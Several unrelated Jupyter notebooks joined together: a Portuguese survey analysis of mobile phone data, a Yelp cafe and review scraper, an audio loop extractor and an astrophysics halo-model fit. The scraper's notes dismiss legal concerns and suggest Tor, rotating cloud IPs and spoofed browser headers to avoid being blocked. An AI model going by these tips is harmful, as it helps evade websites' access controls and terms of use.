sns.boxplot(data = bd_pre, y = 'B1_2', x = 'OPERADORA', hue = 'Resposta', palette=["r", "g"] )
plt.xticks(rotation=90)
plt.legend(loc = 'lower right')

grafico_pct('B1_2')

# Observa-se também as variáveis menos correlacionadas:

# Idade do entrevistado e faixa etária vs Operadora

sns.boxplot(data = bd_pre, x = 'OPERADORA', y = 'Q8', hue = 'Resposta', palette=["r", "g"])

grafico_pct('Q8a')
plt.legend(loc = 'lower right')

# Ao contrário da renda, quanto maior a idade, melhor a avaliação.

# - Q9 - Sexo do entrevistado

grafico_pct('Q9')

# Apesar de a pesquisa não incluir gêneros não-binários, no geral, homens deram notas mais baixas do que mulheres.

# # Arquivo de saída

# Para criar e executar os modelos em R, é gerada uma base em csv:

# Final preprocessed dataset, consumed by the R modelling step.
bd_pre.to_csv('data/base_pre.csv', index = False)

# # Conclusões

# Conforme enunciado do trabalho, os dados foram tratados no Python para posterior modelagem no R:
# - Para a variável resposta, J1, como apenas 0,15% eram de dados faltantes, essas linhas foram removidas da base
# - Tratamento de dados faltantes foi feito tratado como não resposta em 'A1_1', 'A1_2', 'A1_3', 'A1_4'
# - Respostas do Tipo 1 foram todas padronizadas pra 1: sim e 2: não
# - Para facilitar a visualização, as respostas não dadas (99) de todas as perguntas do Tipo 2 foram substituídas por -1
# - Na questão Q8, valores NA foram substituídos pela média da idade de cada faixa
# - Colunas com desvio padrão nulo, ou seja, que possuem apenas uma resposta e, portanto, não vão influenciar os modelos, foram removidas da base para otimizar o processamento: 'A1_2', 'Q1', 'Q2', 'Q3', 'Q4', 'Q6', 'Q7'
# - Optou-se por padronizar algumas respostas realizadas em momentos diferentes e que mudam ao longo dos anos
# - H2 e H2a: respostas 999997, 999998, 999999 foram substituídas por NaN; como alguns modelos não aceitam valores faltantes, todos eles foram substituídos por 0; além disso, cerca de 6% da base teve informação de renda preenchida pela faixa em uma nova coluna: H2b

# # Referências

# As principais referências utilizadas para produção deste relatório foram:
#
# - Material de aula do curso Computação para Ciência de Dados
# - [Dicas do dia](https://github.com/danielscarvalho/Insper-DS-Dicas)
# - [Índice - Table of Contents](https://github.com/jupyterlab/jupyterlab-toc)
# - https://stackoverflow.com/questions/21151450/how-can-i-add-a-table-of-contents-to-a-jupyter-jupyterlab-notebook
# - [Base de dados original e documentação](http://dados.gov.br/dataset/banco-de-dados-da-pesquisa-telefonia-movel-pre-paga)
# - [pandas](https://pandas.pydata.org)
# - [matplotlib](https://matplotlib.org)
# - [pandas ods reader](https://github.com/iuvbio/pandas_ods_reader)
# - [Portal Brasileiro de Dados Abertos - Salário Mínimo](http://www.dados.gov.br/dataset/salario-minimo/resource/8b9ccf0d-aff2-499f-8363-0fcd44ec68b3)
# - [IPEADATA](http://www.ipeadata.gov.br/Default.aspx)
Processamento.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

from urllib.request import urlopen
import requests
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
import re
import time
import random

# +
"""
Legal Issues:
    Don't worry about it. But keep note, I should respect robots.txt
    But if I do collect the data, DO NOT give it to others.
    Just don't sell or advertise that the data is mine.
    Don't mess with financial or gov data.
    Don't infringe on actual copyright stuff.
    Don't enter anything that requires permission, passwords.
    Don't scrape emails, usernames.
    Don't spam forms.
"""

"""
Dealing With HTTP Errors:
    Don't move scrapers too quickly.
    Change headers.
    Don't anything a human wouldn't.
"""

"""
Scraping Remotely:
    Use TOR browser (bounces IP address)
    DuckDuckGo does not store cookies
    Scrape on Google Cloud. Has access to changing IP addresses.
"""
# -

session = requests.Session()
# Browser-like headers so Yelp serves the regular HTML page.
headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'}

'''
Go to starting page. Gather all the links in that one page.
Go to next page. Repeat.
Stop when the page does not exist.
    Problem: the page exists even when it shouldn't
    Example: searching &start=1000 seems to produce the first page
    Solution:
        need to create a numpy array of links,
        append the new links if the new links are not found
        stop if the links are found
    Current Solution (going to change this):
        Specify a limit
'''

# +
def gather_Yelp_data(url, cap_num):
    """
    Given a starting url and a page limit,
    gather all the links to businesses.
    Go to the next page. Gather all links.
    Repeat a specified number of times.
    Return a numpy array of all links gathered.
    """
    item_number = 0
    websites = np.array([])
    # Yelp paginates results 10 at a time via the &start= query parameter.
    while item_number <= cap_num:
        try:
            #html = urlopen(url + "&start=" + str(item_number*10))
            #bs = BeautifulSoup(html.read(), 'lxml')
            req = session.get(url + "&start=" + str(item_number*10), headers=headers)
            bs = BeautifulSoup(req.text, 'lxml')
            links = bs.findAll('a', {'class': "biz-name js-analytics-click"})
            for link in links:
                #print (link)
                link_string = link.attrs['href']
                websites = np.append(websites, np.array([link_string]))
        # NOTE(review): bare except silently hides request/parse failures —
        # likely one source of the "inconsistency" observed below.
        except:
            pass
        time.sleep (random.random())
        item_number += 1
    return websites

starturl = """https://www.yelp.com/search?find_desc=cafe&find_loc=60637"""

start_time = time.time()
sites = gather_Yelp_data(starturl, 0)
print("--- %s seconds ---" % (time.time() - start_time))

sites
# -

# +
"""
Huge Problem of Inconsistency:
    Sometimes things are returned, others nothing is returned.
    Why? I don't know. Running the same thing returns different results.
    So how do I know when I'm not getting any result?
    Label Them
"""

# NOTE(review): this redefinition intentionally shadows the first
# gather_Yelp_data above; it labels each link with the results-page
# number it came from and returns (DataFrame, cap_num).
def gather_Yelp_data(url, cap_num):
    item_number = 0
    websites = []
    num_label = []
    while item_number <= cap_num:
        try:
            req = session.get(url + "&start=" + str(item_number*10), headers=headers)
            bs = BeautifulSoup(req.text, 'lxml')
            links = bs.findAll('a', {'class': "biz-name js-analytics-click"})
            for link in links:
                link_string = link.attrs['href']
                websites.append (link_string)
                num_label.append (item_number)
        except:
            pass
        time.sleep (random.random())
        item_number += 1
    return pd.DataFrame ({'Link':websites, 'Num': num_label}), cap_num

starturl = """https://www.yelp.com/search?find_desc=cafe&find_loc=60637"""
yelp_page_num = 0

start_time = time.time()
sites, yelp_page_num = gather_Yelp_data(starturl, yelp_page_num)
print("--- %s seconds ---" % (time.time() - start_time))

sites
# -

# Ad-hoc check: fetch page 0 directly and print the raw business links.
req = session.get(starturl + "&start=" + str(0), headers=headers)
bs = BeautifulSoup(req.text, 'lxml')
links = bs.findAll('a', {'class': "biz-name js-analytics-click"})
for link in links:
    link_string = link.attrs['href']
    print (link_string)

websites = []

# +
'''
Going to have to search by zip code. There are 42000 zip codes in US.
How do we find the number of cafes in Yelp?
    Take a random sample (say 30) of zip codes.
    Search Yelp through the Zip Code.
    Find average number of businesses.
    Multiply that by 42000
'''
'''
import random
for x in range(30):
    print (random.randint(10000,99999))
'''

# Cafe counts observed for the sampled zip codes.
num_cafes = [
21, 10, 69, 33, 21, 55, 18, 39, 16, 47, 16, 24, 16, 37, 28, 26, 8, 37, 22, 5, 81
]

average_num_Cafe = sum(num_cafes) / len (num_cafes) # 29.952380952380953
num_cafe_in_US = average_num_Cafe * 43000 # 1287952

'''
About 1.945 seconds per visited webpage (10 business for one webpage)
Then about 69.6 hours for visiting all webpages and collecting websites.
About 7.5 seconds per taking all review pages of a single business.
About 3.3 seconds to take all additional info. 10.8 seconds total.
So then 161 days.
'''
print (num_cafe_in_US)
# -

# +
"""
Scraping an individual business:
    Information that I want:
        Address
        Pricing
        Health Score
        Extra info on the right
        Reviews
"""

def getBasicInfo(url):
    """
    Given url of one business,
    gather all basic info except the reviews.
    Returns a dictionary.
""" dict_of_info = {} html = urlopen(url) bs = BeautifulSoup(html.read(), 'lxml') dict_of_info['Address'] = bs.find_all('address')[-1].text price_and_health = bs.find_all('dd', {'class': 'nowrap'}) dict_of_info['Price Range'] = price_and_health[0].text try: dict_of_info['Health Score'] = price_and_health[1].text except: pass more_biz_info = bs.find('div', {'class': "short-def-list"}).find_all('dl',) for info in more_biz_info: dict_of_info[info.find('dt').text] = info.find('dd').text return dict_of_info start_time = time.time() greenline_coffee = """https://www.yelp.com/biz/greenline-coffee-chicago""" greenline = getBasicInfo(greenline_coffee) print("--- %s seconds ---" % (time.time() - start_time)) # + def clear_white_space(i_dict): for key in i_dict.keys(): i_dict[key.strip()] = i_dict.pop(key) for key in i_dict.keys(): i_dict[key] = i_dict[key].strip() return i_dict greenline = clear_white_space(clear_white_space (greenline)) # clear it twice greenline # - """ Now to get the reviews: Want: star number date content """ def get_reviews_in_single_page(bs): """ Given a parsed url, get all review info in a single page. Returns a df. 
""" review_dict = {} # this gets the box of info of Yelp review review_form = bs.find( 'ul', {'class': "ylist ylist-bordered reviews"} ).find_all( 'div', {'class': "review-wrapper"}) rating_list = [] date_list = [] comment_list = [] for review in review_form[1:]: # gets number of stars rating_list.append( review.find('div', {'class': re.compile('i-stars i-stars--regular-.*')}).img.attrs['alt']) # gets dates date_list.append( review.find('span', {'class': "rating-qualifier"}).text) # gets comments comment_list.append( review.find('p', {'lang': "en"}).text) review_dict['Star Ratings'] = rating_list review_dict['Date'] = date_list review_dict['Comment'] = comment_list return pd.DataFrame(review_dict) # + def get_all_reviews(url, page_limit): page_num = 0 review_df = pd.DataFrame() review_url = url while page_num <= page_limit: html = urlopen(review_url) bs = BeautifulSoup(html.read(), 'lxml') review_df = review_df.append(get_reviews_in_single_page(bs)) page_num += 1 review_url = url + '?start=' + str(page_num * 20) # 20 reviews in each page review_df = review_df.drop_duplicates(['Comment']) # .reset_index().drop('index',axis=1) return review_df start_time = time.time() greenline_coffee_reviews = get_all_reviews(greenline_coffee, 2) print("--- %s seconds ---" % (time.time() - start_time)) greenline_coffee_reviews # - # Test code on a different business sanc_url = """https://www.yelp.com/biz/sanctuary-cafe-chicago?osq=cafe""" sanctuary_cafe = getBasicInfo(sanc_url) sanctuary_cafe = clear_white_space(clear_white_space(sanctuary_cafe)) sanctuary_cafe sanctuary_cafe_reviews = get_all_reviews(sanc_url, 2) sanctuary_cafe_reviews greenline_coffee_reviews.to_csv('Greenline Coffee Reviews.csv')
Yelp/Scraping/.ipynb_checkpoints/Scraping Yelp For Websites-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import copy import librosa import madmom import numpy as np import os import tensorly import tensorly.decomposition as tld from sklearn.decomposition import NMF def run_algorithm(audio_file, n_templates=[0,0,0], output_savename="extracted_loop"): """Complete pipeline of algorithm. Parameters ---------- audio_file : string Path to audio file to be loaded and analysed. n_templates : list of length 3 The number of sound, rhythm and loop templates. Default value (0,0,0) causes the script to estimate reasonable values. output_savename: : string Base string for saved output filenames. Returns ------- A set of files containing the extracted loops. Examples -------- >>> run_algorithm("example_song.mp3", [40,20,7], "extracted_loop") See also -------- tensorly.decomposition.non_negative_tucker """ assert os.path.exists(audio_file) assert len(n_templates)==3 assert type(n_templates) is list # Load mono audio: signal_mono, fs = librosa.load(audio_file, sr=None, mono=True) # Use madmom to estimate the downbeat times: downbeat_times = get_downbeats(signal_mono) # Convert times to frames so we segment signal: downbeat_frames = librosa.time_to_samples(downbeat_times, sr=fs) # Create spectral cube out of signal: spectral_cube = make_spectral_cube(signal_mono, downbeat_frames) # Validate the input n_templates (inventing new ones if any is wrong): n_sounds, n_rhythms, n_loops = validate_template_sizes(spectral_cube, n_templates) # Use TensorLy to do the non-negative Tucker decomposition: core, factors = tld.non_negative_tucker(np.abs(spectral_cube), [n_sounds, n_rhythms, n_loops], n_iter_max=500, verbose=True) # Reconstruct each loop: for ith_loop in range(n_loops): # Multiply templates together to get real loop spectrum: loop_spectrum = 
create_loop_spectrum(factors[0], factors[1], core[:,:,ith_loop]) # Choose best bar to reconstruct from (we will use its phase): bar_ind = choose_bar_to_reconstruct(factors[2], ith_loop) # Reconstruct loop signal by masking original spectrum: ith_loop_signal = get_loop_signal(loop_spectrum, spectral_cube[:,:,bar_ind]) # Write signal to disk: librosa.output.write_wav("{0}_{1}.wav".format(output_savename,ith_loop), ith_loop_signal, fs) def get_downbeats(signal): """Use madmom package to estimate downbeats for an audio signal. Parameters ---------- signal : np.ndarray [shape=(n,), dtype=float] Input mono audio signal. Returns ------- downbeat_times : np.ndarray [shape=(n,), dtype=float] List of estimated downbeat times in seconds. Examples -------- >>> signal_mono, fs = librosa.load("example_song.mp3", sr=None, mono=True) >>> get_downbeats(signal_mono) array([1.000e-02, 1.890e+00, 3.760e+00, 5.630e+00, 7.510e+00, 9.380e+00, 1.126e+01, 1.313e+01, 1.501e+01, 1.688e+01, 1.876e+01, 2.064e+01, 2.251e+01, 2.439e+01, 2.626e+01, 2.814e+01, 3.002e+01, 3.189e+01, 3.376e+01, 3.564e+01, 3.751e+01, 3.939e+01, 4.126e+01, 4.314e+01, 4.501e+01, 4.689e+01, 4.876e+01, 5.063e+01, 5.251e+01, 5.439e+01, 5.626e+01, 5.813e+01]) See Also -------- madmom.features.downbeats.RNNDownBeatProcessor madmom.features.downbeats.DBNDownBeatTrackingProcessor """ act = madmom.features.downbeats.RNNDownBeatProcessor()(signal) proc = madmom.features.downbeats.DBNDownBeatTrackingProcessor(beats_per_bar=[3, 4], fps=100) processor_output = proc(act) downbeat_times = processor_output[processor_output[:,1]==1,0] return downbeat_times def make_spectral_cube(signal_mono, downbeat_frames): """Convert audio signal into a spectral cube using specified downbeat frames. An STFT is taken of each segment of audio, and these STFTs are stacked into a 3rd dimension. The STFTs may have different lengths; they are zero-padded to the length of the longest STFT. 
    Parameters
    ----------
    signal_mono : np.ndarray [shape=(n,), dtype=float]
        one-dimensional audio signal to convert
    downbeat_frames : np.ndarray [shape=(n,), dtype=int]
        list of frames separating downbeats (or whatever time interval is desired)

    Returns
    -------
    tensor : np.ndarray [shape=(n1,n2,n3), dtype=complex64]
        tensor containing spectrum slices

    Examples
    --------
    >>> signal_mono, fs = librosa.load("example_song.mp3", sr=None, mono=True)
    >>> downbeat_times = get_downbeats(signal_mono)
    >>> downbeat_frames = librosa.time_to_samples(downbeat_times, sr=fs)
    >>> spectral_cube = make_spectral_cube(signal_mono, downbeat_frames)
    >>> spectral_cube.shape
    (1025, 162, 31)
    >>> spectral_cube[:2,:2,:2]
    array([[[ 18.08905602+0.00000000e+00j, -20.48682976+0.00000000e+00j],
            [-16.07670403+0.00000000e+00j, -44.98669434+0.00000000e+00j]],
           [[-19.45080566+3.66026653e-15j,  -8.5700922 +3.14418630e-16j],
            [  1.01680577-3.67251587e+01j,  35.03190231-2.13507919e+01j]]])
    """
    assert len(signal_mono.shape) == 1
    # For each span of audio, compute the FFT using librosa defaults.
    fft_per_span = [librosa.core.stft(signal_mono[b1:b2]) for b1,b2 in zip(downbeat_frames[:-1],downbeat_frames[1:])]
    # Tensor size 1: the number of frequency bins
    freq_bins = fft_per_span[0].shape[0]
    # Tensor size 2: the length of the STFTs.
    # This could vary for each span; use the maximum.
    rhyt_bins = np.max([fpb.shape[1] for fpb in fft_per_span])
    # Tensor size 3: the number of spans.
    bar_bins = len(fft_per_span)
    # Complex zeros so shorter spans are implicitly zero-padded on the right.
    tensor = np.zeros((freq_bins, rhyt_bins, bar_bins)).astype(complex)
    for i in range(bar_bins):
        tensor[:,:fft_per_span[i].shape[1],i] = fft_per_span[i]
    return tensor

def validate_template_sizes(spectral_cube, n_templates):
    """Ensure that specified number of estimated templates are valid.

    Values must be at least 1 and strictly less than the corresponding
    dimension of the original tensor.
    So, if the tensor has size [1025,100,20], then n_templates = [99,99,10]
    is valid (though unadvised), while n_templates = [30,20,20] is invalid.

    If ANY of the values for n_templates are invalid, then
    get_recommended_template_sizes() is used to obtain replacement values
    for n_templates.

    Parameters
    ----------
    spectral_cube : np.ndarray [shape=(n1,n2,n3)]
        Original tensor to be modeled.
    n_templates : list [shape=(3,), dtype=int]
        Proposed numbers of templates.

    Returns
    -------
    output_n_templates : np.ndarray [shape=(3,), dtype=int]
        Validated numbers of templates.

    Examples
    --------
    >>> validate_template_sizes(np.zeros((1025, 162, 31)), [100, 50, 20])
    array([100, 50, 20])
    >>> validate_template_sizes(np.zeros((1025, 162, 31)), [0, 0, 0])
    array([63, 21, 7])
    >>> validate_template_sizes(np.zeros((1025, 162, 31)), [100, 50, 40])
    array([63, 21, 7])

    See Also
    --------
    get_recommended_template_sizes
    """
    # Valid iff every requested size lies in [1, dim-1] for its dimension.
    max_template_sizes = np.array(spectral_cube.shape) - 1
    min_template_sizes = np.ones_like(max_template_sizes)
    big_enough = np.all(min_template_sizes <= n_templates)
    small_enough = np.all(n_templates <= max_template_sizes)
    valid = big_enough & small_enough
    if valid:
        return n_templates
    else:
        return get_recommended_template_sizes(spectral_cube)

def purify_core_tensor(core, factors, new_rank, dim_to_reduce=2):
    """Reduce the size of the core tensor by modelling repeated content
    across loop recipes.

    The output is a more "pure" set of loop recipes that should be more
    distinct from each other.

    Parameters
    ----------
    core : np.ndarray [shape=(n1,n2,n3)]
        Core tensor to be compressed.
    factors : list [shape=(3,), dtype=np.ndarray]
        List of estimated templates
    new_rank : int
        The new size for the core tensor
    dim_to_reduce : int
        The dimension along which to compress the core tensor.
        (Default value 2 will reduce the number of loop types.)
    Returns
    -------
    new_core : np.ndarray [shape=(n1,n2,new_rank)]
        Compressed version of the core tensor
    new_factors : list [shape=(3,), dtype=np.ndarray]
        New list of templates. Note: two templates will be the same as before;
        only the template for the compressed dimension will be different.
    """
    assert new_rank < core.shape[dim_to_reduce]
    # NMF on the core unfolded along dim_to_reduce: X ~ W @ H with rank new_rank.
    X = tensorly.unfold(core,dim_to_reduce)
    model = NMF(n_components=new_rank, init='nndsvd', random_state=0)
    W = model.fit_transform(X)
    H = model.components_
    # Re-construct core tensor and factors based on NMF factors from core tensor:
    new_shape = list(core.shape)
    new_shape[dim_to_reduce] = new_rank
    new_core = tensorly.fold(H, dim_to_reduce, new_shape)
    new_factors = copy.copy(factors)
    # Absorb W into the factor of the reduced dimension so the product is preserved.
    new_factors[dim_to_reduce] = np.dot(factors[dim_to_reduce],W)
    return new_core, new_factors

def get_recommended_template_sizes(spectral_cube):
    """Propose reasonable values for numbers of templates to estimate.

    If a dimension of the tensor is N, then N^(6/10), rounded down,
    seems to give a reasonable value.

    Parameters
    ----------
    spectral_cube : np.ndarray [shape=(n1,n2,n3)]
        Original tensor to be modeled.

    Returns
    -------
    recommended_sizes : np.ndarray [shape=(len(spectral_cube.shape),), dtype=float]
        Suggested number of templates.

    Examples
    --------
    >>> get_recommended_template_sizes(np.zeros((100,200,300)))
    array([15, 23, 30])
    >>> get_recommended_template_sizes(np.zeros((4,400,40000)))
    array([  1,  36, 577])
    """
    max_template_sizes = np.array(spectral_cube.shape) - 1
    min_template_sizes = np.ones_like(max_template_sizes)
    # Heuristic: floor((dim-1)^0.6), clipped below at 1.
    recommended_sizes = np.floor(max_template_sizes**.6).astype(int)
    recommended_sizes = np.max((recommended_sizes, min_template_sizes),axis=0)
    assert np.all(min_template_sizes <= recommended_sizes)
    assert np.all(recommended_sizes <= max_template_sizes)
    return recommended_sizes

def create_loop_spectrum(sounds, rhythms, core_slice):
    """Recreate loop spectrum from a slice of the core tensor and the first
    two templates, the sounds and rhythms.
Parameters ---------- sounds : np.ndarray [shape=(n_frequency_bins, n_sounds), dtype=float] The sound templates, one spectral template per column. rhythms : np.ndarray [shape=(n_time_bins, n_rhythms), dtype=float] The rhythm templates, or time-in-bar activations functions. One rhythm template per column. core_slice : np.ndarray [shape=(n_sounds, n_rhythms)] A slice of the core tensor giving the recipe for one loop. Returns ------- loop_spectrum : np.ndarray [shape=(n_frequency_bins, n_time_bins), dtype=float] Reconstruction of spectrum. Examples -------- >>> np.random.seed(0) >>> factors = [np.abs(np.random.randn(1025, 63)), np.abs(np.random.randn(162, 21)), np.abs(np.random.randn(31, 7))] >>> core = np.abs(np.random.randn(63,21,7)) >>> create_loop_spectrum(factors[0], factors[1], core[:,:,0]) array([[727.4153606 , 728.64591236, 625.76726056, ..., 512.94167141, 592.2098947 , 607.10457107], [782.11991843, 778.09690543, 682.71895323, ..., 550.43525375, 636.51448493, 666.35600624], [733.96209316, 720.17586837, 621.80762807, ..., 501.51192504, 590.14018676, 605.44147057], ..., [772.43712078, 758.88473642, 654.35159419, ..., 522.69754588, 628.84580165, 641.66347072], [677.58720601, 666.52484723, 583.92269705, ..., 471.24362278, 558.17441475, 573.31864635], [768.96634561, 758.85553214, 639.21515256, ..., 525.83186141, 634.04799161, 644.35772338]]) """ loop_spectrum = np.dot(np.dot(sounds, core_slice), rhythms.transpose()) return loop_spectrum def choose_bar_to_reconstruct(loop_templates, ith_loop): """...Choose... bar... to... reconstruct! For now, it just choose the bar with the largest activation. More information could / should be included, like reducing cross-talk, which would mean considering the activations (but ideally the relative *loudnesses*) of the other loops. Parameters ---------- loop_templates : np.ndarray [shape=(n_bars, n_loop_types), dtype=float] The loop activation templates, one template per column. ith_loop : int The index of the loop template. 
Returns ------- bar_ind : int The index of the bar to choose. Examples -------- >>> np.random.seed(0) >>> factors = [np.abs(np.random.randn(1025, 63)), np.abs(np.random.randn(162, 21)), np.abs(np.random.randn(31, 7))] >>> choose_bar_to_reconstruct(factors[2], 0) 10 """ bar_ind = np.argmax(loop_templates[:,ith_loop]) return bar_ind def get_loop_signal(loop_spectrum, original_spectrum): """Reconstruct the signal for a loop given its spectrum and the original spectrum. The original spectrum is used as the basis, and the reconstructed loop spectrum is used to mask the spectrum. Parameters ---------- loop_spectrum : np.ndarray [shape=(n_freq_bins, n_time_bins_1), dtype=float] Reconstructed loop spectrum (real) original_spectrum : np.ndarray [shape=(n_freq_bins, n_time_bins_2), dtype=complex] Original spectrum (complex; possibly different length of time) Returns ------- signal : np.ndarray [shape=(n,), dtype=float] Estimated signal of isolated loop. Examples -------- >>> np.random.seed(0) >>> random_matrix = np.random.randn(1025,130) >>> loop_spectrum = np.abs(random_matrix) / np.max(random_matrix) >>> random_matrix_2 = np.random.randn(1025,130) >>> loop_spectrum_2 = np.abs(random_matrix_2) / np.max(random_matrix_2) >>> get_loop_signal(loop_spectrum, loop_spectrum_2) array([-5.7243928e-04, -2.3625907e-04, -3.8087784e-04, ..., 9.2569360e-05, 3.9195133e-04, -2.4777438e-04], dtype=float32) See also -------- librosa.util.softmask """ assert loop_spectrum.shape[0] == original_spectrum.shape[0] min_length = np.min((loop_spectrum.shape[1], original_spectrum.shape[1])) orig_mag, orig_phase = librosa.magphase(original_spectrum) mask = librosa.util.softmask(loop_spectrum[:,:min_length], orig_mag[:,:min_length], power=1) masked_spectrum = original_spectrum[:,:min_length] * mask signal = librosa.core.istft(masked_spectrum) return signal run_algorithm("mix1.wav", n_templates=[0,0,0], output_savename="extracted_loop") # # Prototype import pygame pygame.mixer.init() sound = 
pygame.mixer.Sound("extracted_loop_1.wav") sound2 = pygame.mixer.Sound("extracted_loop_12.wav") sound3 = pygame.mixer.Sound("extracted_loop_15.wav") sound.play(-1) sound2.play(-1) sound3.play(-1) pygame.quit() # import pygame # import pygame # pygame.init() # pygame.display.set_mode(pygame.display.list_modes()[-1]) # smallest resolution available # pygame.mixer.init() # pygame.mixer.music.load("sample1.wav") # pygame.mixer.music.play(5) # repeat 5 times # pygame.mixer.music.queue("sample2.wav") # queue test2.wav after test.wav plays 5 times # clock = pygame.time.Clock() # clock.tick(10) # while pygame.mixer.music.get_busy(): # pygame.event.poll() # clock.tick(10)
Applications/Looper.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [conda env:hodemulator] # language: python # name: conda-env-hodemulator-py # --- from itertools import izip from time import time import numpy as np import astropy from pearce.mocks.customHODModels import * from pearce.mocks import cat_dict from scipy.optimize import minimize from SloppyJoes import lazy_wrapper from matplotlib import pyplot as plt # %matplotlib inline import seaborn as sns sns.set() AB = True # + PRIORS = {'f_c': (0, 1), 'alpha': (0, 2), 'logMmin':(10,14), 'logM1': (10, 15), 'logM0': (9,15), 'sigma_logM': (0.3, 1.5), 'logMcut': (9,15), 'logMlin':(9,15), 'f_cen': (0.0,1.0)} _cens_model = RedMagicCens cens_model = _cens_model(z = 0.0) #cens_model = AssembiasReddick14Cens() _sats_model = RedMagicSats #sats_model = AssembiasReddick14Sats() cosmo_params = {'simname':'chinchilla', 'Lbox':400.0, 'scale_factors':[0.658, 1.0]} cat = cat_dict[cosmo_params['simname']](**cosmo_params)#construct the specified catalog! cat.load(1.0, HOD=(_cens_model, _sats_model), hod_kwargs = {'cenocc_model': cens_model}) LBOX = 400.0 #sats_model.modulate_with_cenocc = False # - cat.model.model_dictionary cens_model = cat.model.model_dictionary['centrals_occupation'] sats_model = cat.model.model_dictionary['satellites_occupation'] def resids(theta,params,cens_occ, sats_occ,mbc): cens_model.param_dict['f_c'] = 1.0 sats_model.param_dict['f_c'] = 1.0 cat.model.param_dict['f_c'] = 1.0 cens_model.param_dict.update({p:x for p, x in izip(params, theta)}) sats_model.param_dict.update({p:x for p, x in izip(params, theta)}) cat.model.param_dict.update({p:x for p, x in izip(params, theta)}) cens_preds = cens_model.mean_occupation(prim_haloprop = mbc) sats_preds = sats_model.mean_occupation(prim_haloprop = mbc) #Weird edge cases can occur? 
cens_preds[cens_preds < 1e-9] = 0 sats_preds[sats_preds < 1e-9] = 0 cens_vars = cens_preds*(1-cens_preds)+1e-6 sats_vars = sats_preds + 1e-6 Ngal_pred = np.sum(cens_preds+sats_preds) Ngal_obs = np.sum(cens_occ+sats_occ) idx = sats_occ > 0 #log_sats_diff = (np.log10(sats_preds) - np.log10(sats_occ) ) #log_sats_diff[np.isnan(log_sats_diff)] = 0.0 #log_sats_diff[log_sats_diff == -np.inf] = 0.0 #log_sats_diff[log_sats_diff == np.inf] = 0.0 return np.r_[ (cens_preds-cens_occ),sats_preds-sats_occ, np.array([Ngal_pred-Ngal_obs]) ] #return np.r_[cens_preds[0,:]-cens_occs[0,:], Ngal_pred-Ngal_obs] catalog = astropy.table.Table.read('/u/ki/swmclau2/des/AB_tests/abmatched_halos.hdf5', format = 'hdf5') mag_cut = -21 min_ptcl = 200 if AB: catalog = catalog[np.logical_and(catalog['halo_mvir'] > min_ptcl*cat.pmass, catalog['halo_vpeak_mag'] <=mag_cut)] else: catalog = catalog[np.logical_and(catalog['halo_mvir'] > min_ptcl*cat.pmass, catalog['halo_vvir_mag'] <=mag_cut)] # + active="" # if not AB: # MAP = np.array([ 12.64539386, 14.15396837, 0.52641264, 0.22234201, # 14.34871275, 1.07989646, 12.81902682]) # else: # MAP = np.array([ 12.72747382, 14.24964974, 0.55068739, 0.18672767, # 14.00597843, 1.06836772, 12.88931659]) # # names = ['logMmin', 'logMlin', 'sigma_logM', 'f_cen', 'logM1', 'alpha', 'logMcut'] # hod_params = dict(zip(names, MAP)) # + if not AB: pass else: MAP = np.array([ 12.87956269, 12.24461447, 0.5345765, 13.98105124, 1.04527197]) ['$\\log{M_{min}}$', '$\\log{M_0}$', '$\\sigma_{log{M}}$', '$\\log{M_1}$', '$\\alpha$'] names = ['logMmin', 'logM0', 'sigma_logM', 'logM1', 'alpha'] hod_params = dict(zip(names, MAP)) # - ab_params = {'mean_occupation_centrals_assembias_param1':0.4, 'mean_occupation_satellites_assembias_slope1':3,\ 'mean_occupation_satellites_assembias_param1':-0.5, 'mean_occupation_centrals_assembias_slope1':3,} sats_model.param_dict.update(cens_model.param_dict) # + param_dict = hod_params #param_dict.update(ab_params) 
cens_model.param_dict.update(param_dict) sats_model.param_dict.update(param_dict) params = sats_model.param_dict.keys() ######################## params.remove('f_c') #######################3 ndim = len(params) # - halo_table = cat.halocat.halo_table[cat.halocat.halo_table['halo_mvir'] > min_ptcl*cat.pmass] detected_central_ids = set(catalog[catalog['halo_upid']==-1]['halo_id']) from collections import Counter def compute_occupations(halo_table): #halo_table = cat.halocat.halo_table[cat.halocat.halo_table['halo_mvir'] > min_ptcl*cat.pmass] cens_occ = np.zeros((np.sum(halo_table['halo_upid'] == -1),)) #cens_occ = np.zeros((len(halo_table),)) sats_occ = np.zeros_like(cens_occ) detected_central_ids = set(catalog[catalog['halo_upid']==-1]['halo_id']) detected_satellite_upids = Counter(catalog[catalog['halo_upid']!=-1]['halo_upid']) for idx, row in enumerate(halo_table[halo_table['halo_upid'] == -1]): cens_occ[idx] = 1.0 if row['halo_id'] in detected_central_ids else 0.0 sats_occ[idx]+= detected_satellite_upids[row['halo_id']] return cens_occ, sats_occ from halotools.utils.table_utils import compute_prim_haloprop_bins def compute_hod(masses, centrals, satellites, mass_bins): mass_bin_idxs = compute_prim_haloprop_bins(prim_haloprop_bin_boundaries=mass_bins, prim_haloprop = masses) mass_bin_nos = set(mass_bin_idxs) cens_occ = np.zeros((mass_bins.shape[0]-1,)) sats_occ = np.zeros_like(cens_occ) for mb in mass_bin_nos: indices_of_mb = np.where(mass_bin_idxs == mb)[0] denom = len(indices_of_mb) #TODO what to do about bout 0 mean std's? 
